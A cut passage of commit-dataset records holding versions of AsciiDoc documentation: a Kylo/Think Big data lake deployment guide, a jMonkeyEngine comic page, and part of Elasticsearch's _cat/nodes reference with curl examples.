dladmin\n\tpassword: thinkbig\n\n NiFi UI\n http:\/\/127.0.0.1:8079\/nifi\n\n Elasticsearch REST API\n http:\/\/127.0.0.1:9200\n\n ActiveMQ Admin\n http:\/\/127.0.0.1:8161\/admin\n\n\n== Appendix: Cleanup scripts\nFor development and sandbox environments you can leverage the cleanup script to remove all of the Think Big services as well as Elasticsearch,\nActiveMQ, and NiFi.\n\n $ \/opt\/thinkbig\/setup\/dev\/cleanup-env.sh\n\n IMPORTANT Only run this in a DEV environment. This will delete all application and the MySQL schema\n\nIn addition there is a script for cleaning up the hive schema and HDFS folders that are related to a specific \"category\" that is defined in the UI.\n\n $ \/opt\/thinkbig\/setup\/dev\/cleanupCategory.sh [categoryName]\n\n Example: \/opt\/thinkbig\/setup\/dev\/cleanupCategory.sh customers\n\n== Appendix: Postgres Integration\n\nTBD\n\t\n","old_contents":"= Data Lake Accelerator Deployment Guide\n\nWARNING: There is an issue with the spark client using the SQL context with Orc tables using HDP 2.4.2. Please see this troubleshooting tip configure the spark client to work around the issue.\n\nhttps:\/\/wiki.thinkbiganalytics.com\/display\/RD\/Spark+SQL+fails+on+empty+ORC+table%2C+HDP+2.4.2\n\nThink Big Analytics\nMay 2016\n\n:toc:\n:toclevels: 2\n:toc-title: Contents\n\n== About\n\nThis document explains how to install the Data Lake Accelerator framework as well as Elasticsearch, NiFi, and ActiveMQ. There are a few different ways you can\ninstall it depending on whether or not you are installing all components on one edge node vs. multiple nodes.\n\n== System Requirements\n\n=== Dependencies\n\nThe Data Lake Accelerator services should be installed on an edge node. The following should be available prior to the installing the Data Lake Starter.\n\n.Dependencies\n|===\n|Redhat\/GNU\/Linux distributions\n|RPM (for install)\n|Java 1.8 (or greater)\n|Hadoop 2.4+\n|Spark 1.5.x+\n|Apache NiFi 0.5+ (or Hortonworks DataFlow)\n|Hive\n|MySQL\n|===\n\n.Tested Platforms\n|===\n|Platform|URL|Version\n\n|Hortonworks Sandbox|http:\/\/hortonworks.com\/products\/hortonworks-sandbox\/| HDP 2.3, 2.4\n|Cloudera Sandobx|http:\/\/www.cloudera.com\/downloads\/quickstart_vms\/5-7.html|5.7\n|===\n\n=== Prerequisites\n\n==== Hortonworks Sandbox\n\nIf installing in a new Hortonworks sandbox make sure to do the following first before running through the installation steps below.\n\nlink:.\/hortonworks-sandbox.adoc[Configure Hortonworks Sandbox]\n\n==== Java Requirements\nData Lake Accelerator requires Java 8 for NiFi, thinkbig-ui, and thinkbig-services. If you already have Java 8 installed as the system level Java you have the option to leverage that.\n\nIn some cases, such as with an HDP install, Java 7 is the system version and you likely will not want to change it to Java 8. In this case you can leverage the mentioned\nscripts below to download and configure Java 8 in the \/opt\/java directory. The scripts will also modify the startup scripts for NiFi, thinkbig-ui and\nthinkbig-services to reference the \/opt\/java JAVA_HOME.\n\nIf you already have Java 8 installed in a different location you will have the option to use that as well.\n\nNOTE: When installing the RPM the applications are defaulted to use the \/opt\/java\/current location. This default saves a step for developers so that they can uninstall and re-install\nthe RPM without having to run any other scripts.\n\n== Installation\nThere are 3 procedures you can follow to deploy the solution. In a test and production environment you will likely want to follow the manual installation guide as it has more\ndetailed instructions on how to install each individual component. For local development and 1 node development boxes you can leverage the setup wizard procedure to quickly bootstrap\nyour environment.\n\n=== Install Procedure 1: Installing all components on one edge node with internet access using the wizard\n\nFollow the steps below to install the data lake accelerator using the installation wizard script. This is convenient for local sandboxes (HDP\/Cloudera)\nand 1 node development boxes. The WGET command is used to download binaries so internet access is required.\n\nClick on the below link to go to the wizard driven deployment instructions\n\nlink:.\/deployment\/wizard-deployment-guide.adoc[Wizard Driven Deployment Guide]\n\n=== Install Procedure 2: Installing each component manually\nClick on the below link to go to the manual deployment instructions\n\nlink:.\/deployment\/manual-deployment-guide.adoc[Manual Deployment Guide]\n\n=== Install Procedure 3: Cloudera EC2 Docker Sandbox\nThis is an option for those who want to deploy PCNG to single node Cloudera sandbox in AWS. This is useful when you need to get a quick Cloudera instance running to test PCNG but don't have\nthe resources to install a Cloudera cluster\n\nlink:.\/deployment\/cloudera-docker-sandbox.adoc[Cloudera EC2 Docker Sandbox Deployment Guide ]\n\n== Configuration\n\n=== Kerberos\n\nIf your installing Kylo on a kerberos cluster there is some additional configuration required.\n\n. Configuring Kerberos For Your Local HDP Sandbox\n\n This guide will help you enabled kerberos for your local development sandbox\n\n link:.\/security\/kerberos\/kerberos-installation-example-hdp-2.4.adoc\n\n. Configure Kerberos for NiFi\n\n Some additional configuration is required for allowing the NiFi componenets to work with a Kerberos cluster.\n\n link:.\/security\/kerberos\/nifi-configuration-kerberos-cluster.adoc\n\n. Configure Kerberos for Kylo Applications\n\n Additional configuration is required for allowing some features in the Kylo applications to work with a Kerberos cluster\n\n TODO\n\n=== Configuration Files\n\nConfiguration for the data lake accelerator services are located under the following files:\n\n \/opt\/thinkbig\/thinkbig-ui\/conf\/application.properties\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n\n=== Optimizing Performance\n\nYou can adjust the memory setting for each services using the below environment variables\n\n \/opt\/thinkbig\/thinkbig-ui\/bin\/run-thinkbig-ui.sh\n export THINKBIG_UI_OPTS= -Xmx4g\n\n \/opt\/thinkbig\/thinkbig-services\/bin\/run-thinkbig-services.sh\n export THINKBIG_SERVICES_OPTS= -Xmx4g\n \nThe setting above would set the Java maximum heap size to 4 GB.\n\n=== Change the Java Home\nBy default the thinkbig-services and thinkbig-ui application set the JAVA_HOME location to \/opt\/java\/current. This can easily be changed by editing the JAVA_HOME environment variable\nin the following two files\n\n \/opt\/thinkbig\/thinkbig-ui\/bin\/run-thinkbig-ui.sh\n \/opt\/thinkbig\/thinkbig-services\/bin\/run-thinkbig-services.sh\n\nIn addition, if you run the script to modify the NiFI JAVA_HOME variable you will need to edit\n\n \/opt\/nifi\/current\/bin\/nifi.sh\n\n== Starting and Stopping the Services Manually\nIf you follow the instructions for the installations steps above all of the below applications will be set to startup automatically if you restart the server. In the Hortonworks sandbox\nthe services for thinkbig and NiFI are set to start after all of the services managed by Ambari start up.\n\nFor starting and stopping the 3 data lake accelerator services there you can run the following scripts\n\n \/opt\/thinkbig\/start-thinkbig-apps.sh\n \/opt\/thinkbig\/stop-thinkbig-apps.sh\n\n1. To Start individual services\n\n $ service activemq start\n $ service elasticsearch start\n $ service nifi start\n $ service thinkbig-spark-shell start\n $ service thinkbig-services start\n $ service thinkbig-ui start\n\n2. To Stop individual services\n\n $ service activemq stop\n $ service elasticsearch stop\n $ service nifi stop\n $ service thinkbig-spark-shell stop\n $ service thinkbig-services stop\n $ service thinkbig-ui stop\n\n3. To get the status of individual services\n\n $ service activemq status\n $ service elasticsearch status\n $ service nifi status\n $ service thinkbig-spark-shell status\n $ service thinkbig-services status\n $ service thinkbig-ui status\n\n== Log Output\n\n=== Configuring Log Output\n\nLog output for the services mentioned above are configured at:\n\n\t\t\t\/opt\/thinkbig\/thinkbig-ui\/conf\/log4j.properties\n\t\t\t\/opt\/thinkbig\/thinkbig-services\/conf\/log4j.properties\n\nYou may place logs where desired according to the 'log4j.appender.file.File' property. Note the configuration line:\n\n\t\t\tlog4j.appender.file.File=\/var\/log\/<app>\/<app>.log\n\n=== Viewing Log Output\n\nThe default log locations for the various applications are located at:\n\n\/var\/log\/<service_name>\n\n== Web and REST Access\n\nBelow are the default URL's and ports for the services\n\n Feed Manager and Operations UI\n http:\/\/127.0.0.1:8400\n username: dladmin\n\tpassword: thinkbig\n\n NiFi UI\n http:\/\/127.0.0.1:8079\/nifi\n\n Elasticsearch REST API\n http:\/\/127.0.0.1:9200\n\n ActiveMQ Admin\n http:\/\/127.0.0.1:8161\/admin\n\n\n== Appendix: Cleanup scripts\nFor development and sandbox environments you can leverage the cleanup script to remove all of the Think Big services as well as Elasticsearch,\nActiveMQ, and NiFi.\n\n $ \/opt\/thinkbig\/setup\/dev\/cleanup-env.sh\n\n IMPORTANT Only run this in a DEV environment. This will delete all application and the MySQL schema\n\nIn addition there is a script for cleaning up the hive schema and HDFS folders that are related to a specific \"category\" that is defined in the UI.\n\n $ \/opt\/thinkbig\/setup\/dev\/cleanupCategory.sh [categoryName]\n\n Example: \/opt\/thinkbig\/setup\/dev\/cleanupCategory.sh customers\n\n== Appendix: Postgres Integration\n\nTBD\n\t\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5df69aa9364b4c6bc2cd8910e25b05b89a79fb5b","subject":"more changes to deployment guide","message":"more changes to deployment guide\n","repos":"claudiu-stanciu\/kylo,rashidaligee\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,rashidaligee\/kylo,Teradata\/kylo,Teradata\/kylo,peter-gergely-horvath\/kylo,rashidaligee\/kylo,rashidaligee\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo","old_file":"docs\/latest\/deployment-guide.adoc","new_file":"docs\/latest\/deployment-guide.adoc","new_contents":"= Data Lake Accelerator Deployment Guide\nThink Big Analytics\nMay 2016\n\n:toc:\n:toclevels: 2\n:toc-title: Contents\n\n== About\n\nThis document explains how to install the data lake accelerator framework as well as Elasticsearch, NiFi, and ActiveMQ. There are a few different ways you can\ninstall it depending on whether or not you are installing all components on one edge node vs. multiple nodes.\n\n== System Requirements\n\n=== Dependencies\n\nThe Data Lake Accelerator services should be installed on an edge node. The following should be available prior to the installing the Data Lake Starter.\n\n.Dependencies\n|===\n|Redhat\/GNU\/Linux distributions\n|RPM (for install)\n|Java 1.7 (or greater)\n|Hadoop 2.4+\n|Spark 1.5.x+\n|Apache NiFi 0.5+ (or Hortonworks DataFlow)\n|Hive\n|MySQL\n|===\n\n.Tested Platforms\n|===\n|Platform|URL|Version\n\n|Hortonworks Sandbox|http:\/\/hortonworks.com\/products\/hortonworks-sandbox\/| HDP 2.3, 2.4\n|===\n\n== Installation\n\n=== Procedure for installing all components on 1 edge node\n\nFollow the steps below to install the data lake accelerator. This procedure is also recommended for installing to a Hortonworks sandbox.\n\n\n. Login to the the host using root or sudo access\n\n. Find and download the RPM file from artifactory and place on the host linux machine. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n. Run RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n. Run the setup wizard - \/opt\/thinkbig\/setup\/setup-wizard.sh\n\n Follow the directions and it will install the following:\n * MySQL or Postgres scripts into the local database\n * Elasticsearch\n * ActiveMQ\n * NiFi and the Think Big dependencies\n\n Elasticsearch, NiFi, and ActiveMQ will be started when the wizard is finished\n\n. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\nTIP: See section below on how to use the cleanup script to completely remove all of the components above. This is useful in a DEV or sandbox environment so you can run a clean install.\n\n=== Procedure for installing each component manually\n\nFollow the steps below to install the data lake accelerator manually. This method is useful if you are deploying products across multiple edge nodes\n\n\n1. For each step login to the the host using root or sudo access\n\n2. Find and download the RPM file from artifactory and place on the host linux machine you want to install the data lake accelerator services on. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n3. Run data lake accelerator RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n4. Run the database scripts (see database configuration section)\n\n\n5. Install Elasticsearch\n\n You can leverage an existing elasticsearch installation or follow the steps in the elasticsearch script used by the wizard.\n\n \/opt\/thinkbig\/setup\/elasticsearch\/install-elasticsearch.sh\n\n6. Install ActiveMQ\n\n You can leverage an existing ActiveMQ installation or follow the steps in the ActiveMQ script used by the wizard\n\n \/opt\/thinkbig\/setup\/activemq\/install-activemq.sh\n\n NOTE: If installing on a different node than NiFi and thinkbig-services you will need to update the following properties\n \/opt\/nifi\/ext-config\/config.properties\n\n spring.activemq.broker-url\n\n \/opt\/thinkbig\/thinkbig-services\/conf\/application\/properties\n\n jms.activemq.broker.url\n\n\n7. Install NiFI\n\n You can leverage an existing NiFi installation or follow the steps in the setup directory which is used by the wizard. There are two steps:\n\n 1. Install NiFi\n \/opt\/thinkbig\/setup\/nifi\/install-nifi.sh\n\n 2. Install Think Big specific components\n \/opt\/thinkbig\/setup\/nifi\/install-thinkbig-components.sh\n\n8. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\n== Configuration\n\n=== Configuration Files\n\nConfiguration for the data lake accelerator services are located under the following files:\n\n \/opt\/thinkbig\/thinkbig-ui\/conf\/application.properties\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n\n=== Configuration Properties\n\nBelow is a list of the properties provided by the Pipeline Controller that can be used in the application.properties\nfile. You can use externalized configuration from command line arguments, for example '--spring.config.location=classpath:\/override.properties'.\nSee http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-external-config.html for details.\n\n\n.Server Configuration Properties\n|===\n|Configuration Property|Required|Example\n\n|server.port||8400\n|||\n|===\n\n=== Database Setup\n\nData lake services can be configured to work with Postgres or MySQL. Database and permission setup scripts are provided to assist in the initial configuration process. The script names relevant to setup are below:\n\n==== My SQL\n|===\n|Script Name|Description\n|\/opt\/thinkbig\/setup\/sql\/mysql\/setup-mysql.sh|Create tables used by data lake accelerator services\n|\/opt\/thinkbig\/setup\/sql\/mysql\/drop-mysql.sh DROP|Used to remove the data lake accelerator schema(s)\n|===\n\n\n==== Postgres\nTBD - Not yet supported\n\n\n=== Optimizing Performance\n\nYou can adjust the memory setting of the Pipeline Controller Service using the PIPELINE_APPLICATION_OPTS environment variable. \n\n export THINKBIG_UI_OPTS=Xmx4g\n export THINKBIG_SERVICES_OPTS=Xmx4g\n \nThe setting above would set the Java maximum heap size to 4 GB. \n\n\n== Starting the Services\nNote: These below are installed as services and should start and stop automatically when the machine is rebooted\n\nFor starting and stopping the 3 data lake accelerator services there you can run the following scripts\n\n \/opt\/thinkbig\/start-thinkbig-apps.sh\n \/opt\/thinkbig\/stop-thinkbig-apps.sh\n\n1. To Start individual services\n\n $ service activemq start\n $ service elasticsearch start\n $ service nifi start\n $ service thinkbig-spark-shell start\n $ service thinkbig-services start\n $ service thinkbig-ui start\n\n2. To Stop individual services\n\n $ service activemq stop\n $ service elasticsearch stop\n $ service nifi stop\n $ service thinkbig-spark-shell stop\n $ service thinkbig-services stop\n $ service thinkbig-ui stop\n\n3. To get the status of individual services\n\n $ service activemq status\n $ service elasticsearch status\n $ service nifi status\n $ service thinkbig-spark-shell status\n $ service thinkbig-services status\n $ service thinkbig-ui status\n\n== Viewing Service Output\n\n=== Configuring Log Output\n\nLog output for the services mentioned above are configured at:\n\n\t\t\t\/opt\/thinkbig\/thinkbig-ui\/conf\/log4j.properties\n\t\t\t\/opt\/thinkbig\/thinkbig-services\/conf\/log4j.properties\n\nYou may place logs where desired according to the 'log4j.appender.file.File' property. Note the configuration line:\n\n\t\t\tlog4j.appender.file.File=\/var\/log\/<app>\/<app>.log\n\n=== Viewing Log Output\n\nThe default log locations for the various applications are located at:\n\n\/var\/log\/<service_name>\n\n== Web and REST Access\n\nBelow are the default URL's and ports for the services\n\n Feed Manager and Operations UI\n http:\/\/127.0.0.1:8400\n username: dladmin\n\tpassword: thinkbig\n\n NiFi UI\n http:\/\/127.0.0.1:8079\n\n Elasticsearch REST API\n http:\/\/127.0.0.1:9200\n\n ActiveMQ Admin\n http:\/\/127.0.0.1:8161\/admin\n\n\n== Appendix: Postgres Integration\n\nTBD\n\t\n","old_contents":"= Pipeline Controller Deployment Guide\nThink Big Analytics\nMay 2016\n\n:toc:\n:toclevels: 2\n:toc-title: Contents\n\n== About\n\nThis document explains how to install the data lake accelerator framework as well as Elasticsearch, NiFi, and ActiveMQ. There are a few different ways you can\ninstall it depending on whether or not you are installing all components on one edge node vs. multiple nodes.\n\n== System Requirements\n\n=== Dependencies\n\nPipeline Controller should be installed on an edge node. The following should be available prior to the installing the Data Lake Starter.\n\n.Dependencies\n|===\n|Redhat\/GNU\/Linux distributions\n|RPM (for install)\n|Java 1.7 (or greater)\n|Hadoop 2.4+\n|Spark 1.5.x+\n|Apache NiFi 0.5+ (or Hortonworks DataFlow)\n|Hive\n|MySql\n|===\n\n.Tested Platforms\n|===\n|Platform|URL|Version\n\n|Hortonworks Sandbox|http:\/\/hortonworks.com\/products\/hortonworks-sandbox\/| HDP 2.3, 2.4\n|===\n\n== Installation\n\n=== Procedure for installing all components on 1 edge node\n\nFollow the steps below to install the data lake accelerator. This procedure is also recommended for installing in a Hortonworks sandbox.\n\n\n. Login to the the host using root or sudo access\n\n. Find and download the RPM file from artifactory and place on the host linux machine. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n. Run RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n. Run the setup wizard - \/opt\/thinkbig\/setup\/setup-wizard.sh\n\n Follow the directions and it will install the following:\n * MySQL or Postgres scripts into the local database\n * Elasticsearch\n * ActiveMQ\n * NiFi and the Think Big dependencies\n\n Elasticsearch, NiFi, and ActiveMQ will be started when the wizard is finished\n\n. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\nTip: See section below on how to use the cleanup script to completely remove all of the components above. This is useful in a DEV or sandbox environment so you can run a clean install.\n\n=== Procedure for installing each component manually\n\nFollow the steps below to install the data lake accelerator manually. This method is useful if you are deploying products across multiple edge nodes\n\n\n1. For each step login to the the host using root or sudo access\n\n2. Find and download the RPM file from artifactory and place on the host linux machine you want to install the data lake accelerator services on. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n3. Run data lake accelerator RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n4. Run the database scripts (see database configuration section)\n\n\n5. Install Elasticsearch\n\n You can leverage an existing elasticsearch installation or follow the steps in the elasticsearch script used by the wizard.\n\n \/opt\/thinkbig\/setup\/elasticsearch\/install-elasticsearch.sh\n\n6. Install ActiveMQ\n\n You can leverage an existing ActiveMQ installation or follow the steps in the ActiveMQ script used by the wizard\n\n \/opt\/thinkbig\/setup\/activemq\/install-activemq.sh\n\n Note: If installing on a different node than NiFi and thinkbig-services you will need to update the following properties\n \/opt\/nifi\/ext-config\/config.properties\n spring.activemq.broker-url\n \/opt\/thinkbig\/thinkbig-services\/conf\/application\/properties\n jms.activemq.broker.url\n\n7. Install NiFI\n\n You can leverage an existing NiFi installation or follow the steps in the setup directory which is used by the wizard. There are two steps:\n\n 1. Install NiFi\n \/opt\/thinkbig\/setup\/nifi\/install-nifi.sh\n\n 2. Install Think Big specific components\n \/opt\/thinkbig\/setup\/nifi\/install-thinkbig-components.sh\n\n8. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\n== Configuration\n\n=== Configuration Files\n\nConfiguration for the data lake accelerator services are located under the following files:\n\n \/opt\/thinkbig\/thinkbig-ui\/conf\/application.properties\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n\n=== Configuration Properties\n\nBelow is a list of the properties provided by the Pipeline Controller that can be used in the application.properties\nfile. You can use externalized configuration from command line arguments, for example '--spring.config.location=classpath:\/override.properties'.\nSee http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-external-config.html for details.\n\n\n.Server Configuration Properties\n|===\n|Configuration Property|Required|Example\n\n|server.port||8400\n|||\n|===\n\n=== Database Setup\n\nData lake services can be configured to work with Postgres or MySQL. Database and permission setup scripts are provided to assist in the initial configuration process. The script names relevant to setup are below:\n\n==== My SQL\n|===\n|Script Name|Description\n|\/opt\/thinkbig\/setup\/sql\/mysql\/setup-mysql.sh|Create tables used by data lake accelerator services\n|\/opt\/thinkbig\/setup\/sql\/mysql\/drop-mysql.sh DROP|Used to remove the data lake accelerator schema(s)\n|===\n\n\n==== Postgres\nTBD - Not yet supported\n\n\n=== Optimizing Performance\n\nYou can adjust the memory setting of the Pipeline Controller Service using the PIPELINE_APPLICATION_OPTS environment variable. \n\n export THINKBIG_UI_OPTS=Xmx4g\n export THINKBIG_SERVICES_OPTS=Xmx4g\n \nThe setting above would set the Java maximum heap size to 4 GB. \n\n\n== Starting the Services\nNote: These below are installed as services and should start and stop automatically when the machine is rebooted\n\nFor starting and stopping the 3 data lake accelerator services there you can run the following scripts\n\n \/opt\/thinkbig\/start-thinkbig-apps.sh\n \/opt\/thinkbig\/stop-thinkbig-apps.sh\n\n1. To Start individual services\n\n $ service activemq start\n $ service elasticsearch start\n $ service nifi start\n $ service thinkbig-spark-shell start\n $ service thinkbig-services start\n $ service thinkbig-ui start\n\n2. To Stop individual services\n\n $ service activemq stop\n $ service elasticsearch stop\n $ service nifi stop\n $ service thinkbig-spark-shell stop\n $ service thinkbig-services stop\n $ service thinkbig-ui stop\n\n3. To get the status of individual services\n\n $ service activemq status\n $ service elasticsearch status\n $ service nifi status\n $ service thinkbig-spark-shell status\n $ service thinkbig-services status\n $ service thinkbig-ui status\n\n== Viewing Service Output\n\n=== Configuring Log Output\n\nLog output for the services mentioned above are configured at:\n\n\t\t\t\/opt\/thinkbig\/thinkbig-ui\/conf\/log4j.properties\n\t\t\t\/opt\/thinkbig\/thinkbig-services\/conf\/log4j.properties\n\nYou may place logs where desired according to the 'log4j.appender.file.File' property. Note the configuration line:\n\n\t\t\tlog4j.appender.file.File=\/var\/log\/<app>\/<app>.log\n\n=== Viewing Log Output\n\nThe default log locations for the various applications are located at:\n\n\/var\/log\/<service_name>\n\n== Web and REST Access\n\nBelow are the default URL's and ports for the services\n\n Feed Manager and Operations UI\n http:\/\/127.0.0.1:8400\n username: dladmin\n\tpassword: thinkbig\n\n NiFi UI\n http:\/\/127.0.0.1:8079\n\n Elasticsearch REST API\n http:\/\/127.0.0.1:9200\n\n ActiveMQ Admin\n http:\/\/127.0.0.1:8161\/admin\n\n\n== Appendix: Postgres Integration\n\nTBD\n\t\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ea5bb3af5a81160ea3045c3deca2617d5dfe835","subject":"fix xref","message":"fix xref\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/sdk\/pages\/comic.adoc","new_file":"docs\/modules\/sdk\/pages\/comic.adoc","new_contents":"= jMonkeyEngine -- The Comic Book\n:author:\n:revnumber:\n:revdate: 2020\/04\/11\n:keywords: documentation, tool, sdk\n\n\n\"`Every`\" good open-source project publishes documentation in comic book format. \u2013 zathras\n\nimage:jmonkeyplatform-docu-1.png[jmonkeyplatform-docu-1.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-2.png[jmonkeyplatform-docu-2.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-3.png[jmonkeyplatform-docu-3.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-4.png[jmonkeyplatform-docu-4.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-5.png[jmonkeyplatform-docu-5.png,width=\"\",height=\"\"]\n\nSee also: xref:sdk.adoc[Main SDK Documentation Page]\n","old_contents":"= jMonkeyEngine -- The Comic Book\n:author:\n:revnumber:\n:revdate: 2020\/04\/11\n:keywords: documentation, tool, sdk\n\n\n\"`Every`\" good open-source project publishes documentation in comic book format. \u2013 zathras\n\nimage:jmonkeyplatform-docu-1.png[jmonkeyplatform-docu-1.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-2.png[jmonkeyplatform-docu-2.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-3.png[jmonkeyplatform-docu-3.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-4.png[jmonkeyplatform-docu-4.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-5.png[jmonkeyplatform-docu-5.png,width=\"\",height=\"\"]\n'''\n\nSee also: <<sdk#,Main SDK Documentation Page>>, <<jme3#,Main Engine Documentation Page>>\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"8008432a3b618327d9aed65e26e6ac6b81c480c0","subject":"[DOCS] Update nodes documentation with all headers","message":"[DOCS] Update nodes documentation with all headers\n\nAdds a table with the exhaustive list of all available headers with a brief description (mostly from `org.elasticsearch.rest.action.cat.RestNodesAction`) so that people do not need to go searching for them in the code like I did, or search through `nodes?help`.\n","repos":"aparo\/elasticsearch,aparo\/elasticsearch,vorce\/es-metrics,vorce\/es-metrics,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,vorce\/es-metrics,fubuki\/elasticsearch,fubuki\/elasticsearch,vorce\/es-metrics,fubuki\/elasticsearch,vorce\/es-metrics,aparo\/elasticsearch","old_file":"docs\/reference\/cat\/nodes.asciidoc","new_file":"docs\/reference\/cat\/nodes.asciidoc","new_contents":"[[cat-nodes]]\n== Nodes\n\nThe `nodes` command shows the cluster topology.\n\n[source,shell]\n--------------------------------------------------\n% curl 192.168.56.10:9200\/_cat\/nodes\nSP4H 4727 192.168.56.30 9300 1.0.1 1.6.0_27 72.1gb 35.4 93.9mb 79 239.1mb 0.45 3.4h d m Boneyard\n_uhJ 5134 192.168.56.10 9300 1.0.1 1.6.0_27 72.1gb 33.3 93.9mb 85 239.1mb 0.06 3.4h d * Athena\nHfDp 4562 192.168.56.20 9300 1.0.1 1.6.0_27 72.2gb 74.5 93.9mb 83 239.1mb 0.12 3.4h d m Zarek\n--------------------------------------------------\n\nThe first few columns tell you where your nodes live. For sanity it\nalso tells you what version of ES and the JVM each one runs.\n\n[source,shell]\n--------------------------------------------------\nnodeId pid ip port version jdk\nu2PZ 4234 192.168.56.30 9300 1.0.1 1.6.0_27\nURzf 5443 192.168.56.10 9300 1.0.1 1.6.0_27\nActN 3806 192.168.56.20 9300 1.0.1 1.6.0_27\n--------------------------------------------------\n\n\nThe next few give a picture of your heap, memory, and load.\n\n[source,shell]\n--------------------------------------------------\ndiskAvail heapPercent heapMax ramPercent ramMax load\n 72.1gb 31.3 93.9mb 81 239.1mb 0.24\n 72.1gb 19.6 93.9mb 82 239.1mb 0.05\n 72.2gb 64.9 93.9mb 84 239.1mb 0.12\n--------------------------------------------------\n\nThe last columns provide ancillary information that can often be\nuseful when looking at the cluster as a whole, particularly large\nones. How many master-eligible nodes do I have? How many client\nnodes? It looks like someone restarted a node recently; which one was\nit?\n\n[source,shell]\n--------------------------------------------------\nuptime data\/client master name\n 3.5h d m Boneyard\n 3.5h d * Athena\n 3.5h d m Zarek\n--------------------------------------------------\n\n[float]\n=== Columns\n\nBelow is an exhaustive list of the existing headers that can be\npassed to `nodes?h=` to retrieve the relevant details in ordered\ncolumns. If no headers are specified, then those marked to Appear\nby Default will appear. If any header is specified, then the defaults\nare not used.\n\nAliases can be used in place of the full header name for brevity.\nColumns appear in the order that they are listed below unless a\ndifferent order is specified (e.g., `h=pid,id` versus `h=id,pid`).\n\nWhen specifying headers, the headers are not placed in the output\nby default. To have the headers appear in the output, use verbose\nmode (`v`). The header name will match the supplied value (e.g.,\n`pid` versus `p`). For example:\n\n[source,shell]\n--------------------------------------------------\n% curl 192.168.56.10:9200\/_cat\/nodes?v\\&h=id,ip,port,v,m\nid ip port version m\npLSN 192.168.56.30 9300 1.0.1 m\nk0zy 192.168.56.10 9300 1.0.1 m\n6Tyi 192.168.56.20 9300 1.0.1 *\n% curl 192.168.56.10:9200\/_cat\/nodes?h=id,ip,port,v,m\npLSN 192.168.56.30 9300 1.0.1 m\nk0zy 192.168.56.10 9300 1.0.1 m\n6Tyi 192.168.56.20 9300 1.0.1 *\n--------------------------------------------------\n\n[cols=\"<,<,<,<,<\",options=\"header\",]\n|=======================================================================\n|Header |Alias |Appear by Default |Description |Example\n|`id` |`nodeId` |No |Unique node ID |k0zy\n|`pid` |`p` |No |Process ID |13061\n|`host` |`h` |Yes |Host name |n1\n|`ip` |`i` |Yes |IP address |127.0.1.1\n|`port` |`po` |No |Bound transport port |9300\n|`version` |`v` |No |Elasticsearch version |1.0.1\n|`build` |`b` |No |Elasticsearch Build hash |5c03844\n|`jdk` |`j` |No |Running Java version |1.8.0\n|`disk.avail` |`d`, `disk`, `diskAvail` |No |Available disk space |1.8gb\n|`heap.percent` |`hp`, `heapPercent` |No |Used heap percentage |7\n|`heap.max` |`hm`, `heapMax` |No |Maximum configured heap |1015.6mb\n|`ram.percent` |`rp`, `ramPercent` |No |Used total memory percentage |47\n|`ram.max` |`rm`, `ramMax` |No |Total memory |2.9gb\n|`load` |`l` |No |Most recent load average |0.22\n|`uptime` |`u` |No |Node uptime |17.3m\n|`node.role` |`r`, `role`, `dc`, `nodeRole` |Yes |Data node (d); Client\nnode (c) |d\n|`master` |`m` |Yes |Current master (*); master eligible (m) |m\n|`name` |`n` |Yes |Node name |Venom\n|`completion.size` |`cs`, `completionSize` |No |Size of completion |0b\n|`fielddata.memory_size` |`fm`, `fielddataMemory` |No |Used fielddata\ncache 